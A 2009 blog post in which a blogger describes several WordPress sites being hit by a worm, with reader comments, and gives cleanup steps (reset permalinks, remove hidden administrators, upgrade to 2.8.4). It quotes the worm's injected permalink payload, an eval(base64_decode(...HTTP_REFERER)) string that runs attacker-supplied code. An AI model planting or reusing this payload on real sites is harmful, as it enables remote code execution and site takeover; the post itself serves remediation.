-
HACKED! How To Fix This WordPress Worm That’s Been Going Around
0September 8th, 2009RecommendationGrrrr.
These blogs of mine were affected by the recent wordpress worm that has been spreading across the internet ..
BattlingForHealth.com
AndYouWill.com
CatLvr.com
FishLvr.com
BirdLvr.com
PapillonLvr.com
HorseLvr.com
and this one – HART-Empire.comWhat Happened?
Everybody is linking here on twitter and around the web .. so I will do that too ..
Please Read: Lorelle on WordPress – Old WordPress Versions Under Attack (Sep 4/2009)
Basically, all the permalinks from the above blogs had this attached to it:
/[old-permalink-post-title]/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/
How widespread has it been? Even Scobleizer was hit!
WordPress offers some advice – but it doesn’t really offer a solution (that I can find).
HOW TO FIX YOUR BLOG IF YOU ARE AFFECTED
The best fix that I found was on Andy Sowards blog –
UPDATED! Breaking: WordPress MySQL injection – how to fix latest attack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Let Me Recap: It’s not that hard to do.
1) Fix your Permalinks (settings/permalinks/update)
> You can do this in your blog .. just remove the custom permalink modification by this worm2) Check and Remove (if exists) any new Administrators – could be hidden.
> You can do this from your blog, or see via phpMyAdmin in your cPanelDo Yourself A Favor
If you haven’t been hit with this wordpress worm, upgrade to the latest wordpress version 2.8.4.
If you have been hit with this wordpress worm, upgrade to the latest wordpress version 2.8.4.
There is always good reason to keep upgrading to the latest version, and it’s all security and peace of mind. WordPress makes it so easy to upgrade now – all you have to do is push a button – so, there should be no reason why you wouldn’t want to have the latest version around.
Tags: hacked, wordpress wormThese Posts May (or may not) Be Related!
11 responses to “HACKED! How To Fix This WordPress Worm That’s Been Going Around” 
-
Thanks for the info. This is the reason, as you say, that is good to keep blog software updated, and WordPress releases a lot of quick security updates, so there is no reason to not do it. 🙂
.-= ** Check out greven´s last blog .. Wallpapers of the Week =-. -
WordPress 2.8.4 which addresses the issue was released on August 12th, long before you went on a trip to the cottage.
wordpress.org/development/2009/08/2-8-4-security-release/
However, I think you’ve learned your lesson. Also wanted to mention that if a blog has been compromised, the solution is to not upgrade to 2.8.4 since that won’t do any good but to just wipe out the site and start over with a fresh database, fresh administrator accounts, etc on the latest version. At least this way, you can have the peace of mind of there not being any backdoors on your installation.
.-= ** Check out Jeffro´s last blog .. WordPress Idea Roundup =-. -
Sorry to hear you got hit by that one man!
And I agree with Jeff – timely upgrades are a must.
Alex
.-= ** Check out Alex Sysoef´s last blog .. Expert WordPress Automated Blog Installer =-. -
The Entrecard blog got hit by this one at the weekend too. Luckily I either use Blogger or create sites in HTML / CSS, so it didn’t target anything of mine.
.-= ** Check out John | English Wilderness´s last blog .. Common Blue Damselfly =-. -
I was dragging my heels on the latest wordpress update, but I had the good sense to do it sometime last week.
Boy, what a relief that I didn’t have to contend with this one. I am glad that others will be prepared with the fix you offered.
.-= ** Check out Jay Zuck´s last blog .. Jason, Where Have You Been? =-. -
Great tutorial on getting rid of those nasty worms. We’ve seen it happen to a few blogs and it can be a pain to fix.
-
Thanks for the info.I always try to keep my WordPress blogs updated to the latest version, but some important plugins may not work after that because they are not compatible with the newest WP version.So it´s a little dilemma…
-Tom Lindstrom
-
It is also easy to backup and transfer all your websites from one server to another server if you have cPanel installed`;,
-
try www.guru.com/ I used to be listed on there – it’s all well established and both client and developer are well protected.
greven September 8th, 2009 at 09:42